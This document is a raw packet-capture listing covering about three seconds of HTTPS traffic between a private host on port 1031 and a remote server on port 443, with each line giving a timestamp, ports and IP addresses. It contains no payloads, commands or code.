Sep 23, 2013 11:35:39.328561068 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:39.363997936 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.364011049 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.364743948 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:39.414863110 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.415611982 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:39.415632010 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.457967043 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.458687067 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:39.458698988 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.459528923 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:39.479847908 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.479861975 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.480632067 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:39.492117882 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.492865086 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:39.492885113 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.493566990 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:39.516279936 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.516299963 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.517225981 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:39.698664904 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.699477911 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:39.699502945 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.700093985 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:39.715079069 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.720628977 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.721143961 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:39.721154928 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.721626997 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:39.760296106 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.760317087 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.761163950 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:39.799807072 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.800554991 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:39.800584078 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.801186085 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:39.803889990 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.803904057 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.804651976 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:39.878802061 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.879540920 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:39.879559994 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.879760981 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:39.917454958 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.918268919 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:39.918289900 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.918369055 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:39.962213993 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.963042021 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:39.963062048 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.975080013 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.975831032 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:39.975855112 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.976516962 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:39.995903969 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.995923042 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.996670961 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.007894993 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.008711100 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.008730888 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.009391069 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.017608881 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.017622948 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.018354893 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.031924009 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.032730103 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.032752037 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.033332109 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.046401024 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.046416998 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.047147036 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.067898989 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.067974091 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.068696976 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.068712950 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.068778038 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.082396984 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.083128929 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.083146095 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.083228111 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.108136892 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.108838081 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.108855009 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.115257978 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.115925074 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.115943909 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.116532087 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.136874914 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.136899948 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.137120962 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.137609959 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.137902021 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.137912989 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.138341904 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.139678001 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.139688015 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.140454054 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.173986912 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.174009085 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.174807072 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.174827099 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.174886942 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.175118923 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.183001041 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.183738947 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.183758974 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.184370995 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.202692032 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.208242893 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.208981991 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.209001064 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.209079027 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.228394032 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.229182959 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.229204893 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.229815006 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.252696037 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.287059069 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.287796021 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.287813902 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.288454056 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.294085026 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.294097900 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.294898033 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.306334019 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.307074070 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.307089090 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.307149887 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.307174921 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.307765961 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.307774067 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.308465958 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.316504955 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.344644070 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.345395088 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.345413923 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.345936060 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.350492001 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.359479904 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.360213041 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.360233068 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.360847950 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.381808043 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.393171072 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.393927097 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.393944979 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.394023895 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.397080898 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.397833109 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.397850037 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.398375988 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.411381960 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.418900967 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.419644117 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.419661999 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.420233965 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.429663897 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.436431885 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.437149048 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.437166929 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.513216972 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.513921022 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.513938904 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.519001961 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.519737959 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.519757032 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.519835949 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.586447001 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.587245941 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.587264061 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.587330103 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.600246906 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.600982904 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.601001978 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.601330042 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.609500885 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.619293928 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.620198011 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.620217085 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.620826006 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.626141071 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.648168087 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.648968935 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.648991108 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.649724007 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.657134056 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.663595915 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.664341927 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.664356947 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.664928913 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.671291113 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.671304941 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.671742916 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.672111034 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.672414064 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.672425032 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.672864914 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.716783047 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.795525074 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.796258926 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.796278954 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.797014952 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.805455923 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.834907055 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.835570097 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.835587978 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.835932016 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.851542950 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.860615015 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.861355066 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.861386061 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.861963987 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.869982958 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.869993925 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.870764017 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.916495085 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.917344093 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.917365074 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.917983055 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.959961891 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.975258112 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.975994110 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:40.976012945 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:40.976350069 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:41.012680054 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.021852016 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.022694111 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:41.022715092 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.023283005 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:41.024840117 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.024849892 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.025588036 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:41.038239956 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.038986921 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:41.039005041 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.039681911 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:41.047759056 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.052072048 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.052679062 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:41.052695036 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.052903891 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:41.087924957 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.088671923 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:41.088709116 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.089431047 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:41.097209930 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.097235918 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.098036051 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:41.130009890 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.130904913 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:41.130923033 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.130987883 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:41.147383928 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.148140907 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:41.148169041 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.162117004 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.162147045 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.162995100 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:41.163017988 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.163105965 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:41.163346052 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:41.191219091 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.191235065 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.192051888 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:41.205252886 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.206105947 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:41.206123114 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.206187963 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:41.257739067 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.258548021 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:41.258563995 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.258656979 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:41.428028107 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.428770065 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:41.428790092 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.429516077 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:41.467813015 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.493736029 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.494549990 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:41.494568110 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.495176077 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:41.644346952 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.735347986 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.736196995 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:41.736217976 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.871678114 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.872490883 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:41.872508049 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.873117924 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:41.934043884 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.970541954 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.971357107 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:41.971378088 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:41.971704960 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:42.034533024 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.072478056 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.073291063 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:42.073312044 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.074028969 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:42.128900051 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.149149895 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.149965048 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:42.149986982 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.150600910 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:42.164671898 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.164685965 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.165493965 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:42.268244028 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.269023895 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:42.269043922 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.269125938 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:42.303225994 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.304083109 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:42.304101944 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.304837942 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:42.368834972 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.432041883 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.432863951 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:42.432898045 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.433623075 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:42.482578993 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.484654903 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.485456944 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:42.485476971 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.506266117 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.507080078 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:42.507101059 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.507179022 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:42.540177107 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.540915966 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:42.540937901 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.541595936 CEST	1031	443	192.168.0.10	74.221.210.125
